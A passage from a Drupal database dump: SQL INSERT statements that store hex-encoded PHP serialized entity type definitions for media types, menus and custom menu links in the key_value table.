68223b733a34333a227a356d67626e315049565a35544e4d4279426d6976716f5f753352646b353855497a70794e34797054654d223b7d733a31343a22002a007472757374656444617461223b623a313b733a31353a22002a00646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a343a2266696c65223b693a313b733a353a226d65646961223b7d7d733a31323a22002a00697353796e63696e67223b623a303b733a353a22002a006964223b733a32383a226d656469612e6669656c645f6d656469615f766964656f5f66696c65223b733a31333a22002a006669656c645f6e616d65223b733a32323a226669656c645f6d656469615f766964656f5f66696c65223b733a31343a22002a00656e746974795f74797065223b733a353a226d65646961223b733a373a22002a0074797065223b733a343a2266696c65223b733a393a22002a006d6f64756c65223b733a343a2266696c65223b733a31313a22002a0073657474696e6773223b613a343a7b733a31313a227461726765745f74797065223b733a343a2266696c65223b733a31333a22646973706c61795f6669656c64223b623a303b733a31353a22646973706c61795f64656661756c74223b623a303b733a31303a227572695f736368656d65223b733a363a227075626c6963223b7d733a31343a22002a0063617264696e616c697479223b693a313b733a31353a22002a007472616e736c617461626c65223b623a313b733a393a22002a006c6f636b6564223b623a303b733a32353a22002a00706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b733a31303a22002a00696e6465786573223b613a303a7b7d733a31303a22002a0064656c65746564223b623a303b7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('entity.definitions.installed', 'media_type.entity_type', 0x4f3a34323a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747954797065223a34333a7b733a353a22002a006964223b733a31303a226d656469615f74797065223b733a383a22002a00636c617373223b733a32393a2244727570616c5c6d656469615c456e746974795c4d6564696154797065223b733a31313a22002a0070726f7669646572223b733a353a226d65646961223b733a31353a22002a007374617469635f6361636865223b623a303b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a393a7b733a323a226964223b733a323a226964223b733a353a226c6162656c223b733a353a226c6162656c223b733a363a22737461747573223b733a363a22737461747573223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a343a2275756964223b733a343a2275756964223b7d733a31363a22002a006f726967696e616c436c617373223b733a32393a2244727570616c5c6d656469615c456e746974795c4d6564696154797065223b733a31313a22002a0068616e646c657273223b613a353a7b733a363a22616363657373223b733a34323a2244727570616c5c6d656469615c4d6564696154797065416363657373436f6e74726f6c48616e646c6572223b733a343a22666f726d223b613a333a7b733a333a22616464223b733a32363a2244727570616c5c6d656469615c4d6564696154797065466f726d223b733a343a2265646974223b733a32363a2244727570616c5c6d656469615c4d6564696154797065466f726d223b733a363a2264656c657465223b733a34343a2244727570616c5c6d656469615c466f726d5c4d656469615479706544656c657465436f6e6669726d466f726d223b7d733a31323a226c6973745f6275696c646572223b733a33333a2244727570616c5c6d656469615c4d65646961547970654c6973744275696c646572223b733a31343a22726f7574655f70726f7669646572223b613a323a7b733a343a2268746d6c223b733a35313a2244727570616c5c436f72655c456e746974795c526f7574696e675c44656661756c7448746d6c526f75746550726f7669646572223b733a31313a227065726d697373696f6e73223b733a34393a2244727570616c5c757365725c456e746974795c456e746974795065726d697373696f6e73526f75746550726f7669646572223b7d733a373a2273746f72616765223b733a34353a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747953746f72616765223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a32323a2261646d696e6973746572206d65646961207479706573223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a353a7b733a383a226164642d666f726d223b733a32363a222f61646d696e2f7374727563747572652f6d656469612f616464223b733a393a22656469742d666f726d223b733a34323a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f7b6d656469615f747970657d223b733a31313a2264656c6574652d666f726d223b733a34393a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f7b6d656469615f747970657d2f64656c657465223b733a32333a22656e746974792d7065726d697373696f6e732d666f726d223b733a35343a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f7b6d656469615f747970657d2f7065726d697373696f6e73223b733a31303a22636f6c6c656374696f6e223b733a32323a222f61646d696e2f7374727563747572652f6d65646961223b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b733a353a226d65646961223b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31303a224d656469612074797065223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31313a224d65646961207479706573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31303a226d656469612074797065223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31313a226d65646961207479706573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a31373a2240636f756e74206d656469612074797065223b733a363a22706c7572616c223b733a31383a2240636f756e74206d65646961207479706573223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a31333a22636f6e66696775726174696f6e223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e66696775726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b4e3b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a32323a22636f6e6669673a6d656469615f747970655f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a303a7b7d733a31333a22002a006164646974696f6e616c223b613a313a7b733a31303a22746f6b656e5f74797065223b733a31303a226d656469615f74797065223b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a31363a22002a00636f6e6669675f707265666978223b733a343a2274797065223b733a31343a22002a006c6f6f6b75705f6b657973223b613a313a7b693a303b733a343a2275756964223b7d733a31363a22002a00636f6e6669675f6578706f7274223b613a393a7b693a303b733a323a226964223b693a313b733a353a226c6162656c223b693a323b733a31313a226465736372697074696f6e223b693a333b733a363a22736f75726365223b693a343b733a32353a2271756575655f7468756d626e61696c5f646f776e6c6f616473223b693a353b733a31323a226e65775f7265766973696f6e223b693a363b733a32303a22736f757263655f636f6e66696775726174696f6e223b693a373b733a393a226669656c645f6d6170223b693a383b733a363a22737461747573223b7d733a32313a22002a006d6572676564436f6e6669674578706f7274223b613a303a7b7d7d),
('entity.definitions.installed', 'menu.entity_type', 0x4f3a34323a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747954797065223a34333a7b733a353a22002a006964223b733a343a226d656e75223b733a383a22002a00636c617373223b733a32353a2244727570616c5c73797374656d5c456e746974795c4d656e75223b733a31313a22002a0070726f7669646572223b733a363a2273797374656d223b733a31353a22002a007374617469635f6361636865223b623a303b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a383a7b733a323a226964223b733a323a226964223b733a353a226c6162656c223b733a353a226c6162656c223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a343a2275756964223b733a343a2275756964223b7d733a31363a22002a006f726967696e616c436c617373223b733a32353a2244727570616c5c73797374656d5c456e746974795c4d656e75223b733a31313a22002a0068616e646c657273223b613a323a7b733a363a22616363657373223b733a33383a2244727570616c5c73797374656d5c4d656e75416363657373436f6e74726f6c48616e646c6572223b733a373a2273746f72616765223b733a32353a2244727570616c5c73797374656d5c4d656e7553746f72616765223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a31353a2261646d696e6973746572206d656e75223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a303a7b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b4e3b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a224d656e75223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a353a224d656e7573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a226d656e75223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a353a226d656e7573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a31313a2240636f756e74206d656e75223b733a363a22706c7572616c223b733a31323a2240636f756e74206d656e7573223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a31333a22636f6e66696775726174696f6e223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e66696775726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b4e3b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a31363a22636f6e6669673a6d656e755f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a303a7b7d733a31333a22002a006164646974696f6e616c223b613a303a7b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a31363a22002a00636f6e6669675f707265666978223b4e3b733a31343a22002a006c6f6f6b75705f6b657973223b613a313a7b693a303b733a343a2275756964223b7d733a31363a22002a00636f6e6669675f6578706f7274223b613a343a7b693a303b733a323a226964223b693a313b733a353a226c6162656c223b693a323b733a31313a226465736372697074696f6e223b693a333b733a363a226c6f636b6564223b7d733a32313a22002a006d6572676564436f6e6669674578706f7274223b613a303a7b7d7d),
('entity.definitions.installed', 'menu_link_content.entity_type', 0x4f3a33363a2244727570616c5c436f72655c456e746974795c436f6e74656e74456e7469747954797065223a33393a7b733a353a22002a006964223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b733a383a22002a00636c617373223b733a34373a2244727570616c5c6d656e755f6c696e6b5f636f6e74656e745c456e746974795c4d656e754c696e6b436f6e74656e74223b733a31313a22002a0070726f7669646572223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b733a31353a22002a007374617469635f6361636865223b623a313b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a393a7b733a323a226964223b733a323a226964223b733a383a227265766973696f6e223b733a31313a227265766973696f6e5f6964223b733a353a226c6162656c223b733a353a227469746c65223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a343a2275756964223b733a343a2275756964223b733a363a2262756e646c65223b733a363a2262756e646c65223b733a393a227075626c6973686564223b733a373a22656e61626c6564223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b7d733a31363a22002a006f726967696e616c436c617373223b733a34373a2244727570616c5c6d656e755f6c696e6b5f636f6e74656e745c456e746974795c4d656e754c696e6b436f6e74656e74223b733a31313a22002a0068616e646c657273223b613a363a7b733a373a2273746f72616765223b733a34383a225c44727570616c5c6d656e755f6c696e6b5f636f6e74656e745c4d656e754c696e6b436f6e74656e7453746f72616765223b733a31343a2273746f726167655f736368656d61223b733a35333a2244727570616c5c6d656e755f6c696e6b5f636f6e74656e745c4d656e754c696e6b436f6e74656e7453746f72616765536368656d61223b733a363a22616363657373223b733a36303a2244727570616c5c6d656e755f6c696e6b5f636f6e74656e745c4d656e754c696e6b436f6e74656e74416363657373436f6e74726f6c48616e646c6572223b733a343a22666f726d223b613a323a7b733a373a2264656661756c74223b733a34393a2244727570616c5c6d656e755f6c696e6b5f636f6e74656e745c466f726d5c4d656e754c696e6b436f6e74656e74466f726d223b733a363a2264656c657465223b733a35353a2244727570616c5c6d656e755f6c696e6b5f636f6e74656e745c466f726d5c4d656e754c696e6b436f6e74656e7444656c657465466f726d223b7d733a31323a22766965775f6275696c646572223b733a33363a2244727570616c5c436f72655c456e746974795c456e74697479566965774275696c646572223b733a31303a226d6f6465726174696f6e223b733a303a22223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a31353a2261646d696e6973746572206d656e75223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a333a7b733a393a2263616e6f6e6963616c223b733a35313a222f61646d696e2f7374727563747572652f6d656e752f6974656d2f7b6d656e755f6c696e6b5f636f6e74656e747d2f65646974223b733a393a22656469742d666f726d223b733a35313a222f61646d696e2f7374727563747572652f6d656e752f6974656d2f7b6d656e755f6c696e6b5f636f6e74656e747d2f65646974223b733a31313a2264656c6574652d666f726d223b733a35333a222f61646d696e2f7374727563747572652f6d656e752f6974656d2f7b6d656e755f6c696e6b5f636f6e74656e747d2f64656c657465223b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b4e3b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b733a33323a226d656e755f6c696e6b5f636f6e74656e745f6669656c645f7265766973696f6e223b733a31373a22002a007265766973696f6e5f7461626c65223b733a32363a226d656e755f6c696e6b5f636f6e74656e745f7265766973696f6e223b733a31333a22002a00646174615f7461626c65223b733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a313b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31363a22437573746f6d206d656e75206c696e6b223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31373a22437573746f6d206d656e75206c696e6b73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31363a22637573746f6d206d656e75206c696e6b223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31373a22637573746f6d206d656e75206c696e6b73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a32333a2240636f756e7420637573746f6d206d656e75206c696e6b223b733a363a22706c7572616c223b733a32343a2240636f756e7420637573746f6d206d656e75206c696e6b73223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a373a22636f6e74656e74223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a22436f6e74656e74223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b4e3b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a32323a226d656e755f6c696e6b5f636f6e74656e745f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a333a7b733a31373a224d656e7554726565486965726172636879223b613a303a7b7d733a31333a22456e746974794368616e676564223b4e3b733a32363a22456e74697479556e7472616e736c617461626c654669656c6473223b4e3b7d733a31333a22002a006164646974696f6e616c223b613a303a7b7d733a31343a22002a005f73657276696365496473223b613a313a7b733a31373a22737472696e675472616e736c6174696f6e223b733a31383a22737472696e675f7472616e736c6174696f6e223b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32353a22002a007265766973696f6e5f6d657461646174615f6b657973223b613a343a7b733a31333a227265766973696f6e5f75736572223b733a31333a227265766973696f6e5f75736572223b733a31363a227265766973696f6e5f63726561746564223b733a31363a227265766973696f6e5f63726561746564223b733a32303a227265766973696f6e5f6c6f675f6d657373616765223b733a32303a227265766973696f6e5f6c6f675f6d657373616765223b733a31363a227265766973696f6e5f64656661756c74223b733a31363a227265766973696f6e5f64656661756c74223b7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('entity.definitions.installed', 'menu_link_content.field_storage_definitions', 0x613a32373a7b733a323a226964223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a373a22002a0074797065223b733a373a22696e7465676572223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31383a22002a006669656c64446566696e6974696f6e223b723a323b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a696e7465676572223b733a383a2273657474696e6773223b613a363a7b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a333a226d696e223b733a303a22223b733a333a226d6178223b733a303a22223b733a363a22707265666978223b733a303a22223b733a363a22737566666978223b733a303a22223b7d7d7d733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a393a22456e74697479204944223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a22726561642d6f6e6c79223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34383a2254686520656e7469747920494420666f722074686973206d656e75206c696e6b20636f6e74656e7420656e746974792e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b733a31303a226669656c645f6e616d65223b733a323a226964223b733a31313a22656e746974795f74797065223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d7d733a343a2275756964223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a373a22002a0074797065223b733a343a2275756964223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a363a2262696e617279223b623a303b7d7d733a31313a22756e69717565206b657973223b613a313a7b733a353a2276616c7565223b613a313a7b693a303b733a353a2276616c7565223b7d7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31383a22002a006669656c64446566696e6974696f6e223b723a34303b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31353a226669656c645f6974656d3a75756964223b733a383a2273657474696e6773223b613a333a7b733a31303a226d61785f6c656e677468223b693a3132383b733a383a2269735f6173636969223b623a313b733a31343a22636173655f73656e736974697665223b623a303b7d7d7d733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a2255554944223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a22726561642d6f6e6c79223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32373a2254686520636f6e74656e74206d656e75206c696e6b20555549442e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b733a31303a226669656c645f6e616d65223b733a343a2275756964223b733a31313a22656e746974795f74797065223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d7d733a31313a227265766973696f6e5f6964223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a373a22002a0074797065223b733a373a22696e7465676572223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31383a22002a006669656c64446566696e6974696f6e223b723a37373b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a696e7465676572223b733a383a2273657474696e6773223b613a363a7b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a333a226d696e223b733a303a22223b733a333a226d6178223b733a303a22223b733a363a22707265666978223b733a303a22223b733a363a22737566666978223b733a303a22223b7d7d7d733a31333a22002a00646566696e6974696f6e223b613a373a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31313a225265766973696f6e204944223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a22726561642d6f6e6c79223b623a313b733a383a2270726f7669646572223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b733a31303a226669656c645f6e616d65223b733a31313a227265766973696f6e5f6964223b733a31313a22656e746974795f74797065223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d7d733a383a226c616e67636f6465223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a373a22002a0074797065223b733a383a226c616e6775616765223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a323a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31383a22002a006669656c64446566696e6974696f6e223b723a3131313b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31393a226669656c645f6974656d3a6c616e6775616765223b733a383a2273657474696e6773223b613a303a7b7d7d7d733a31333a22002a00646566696e6974696f6e223b613a31303a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a2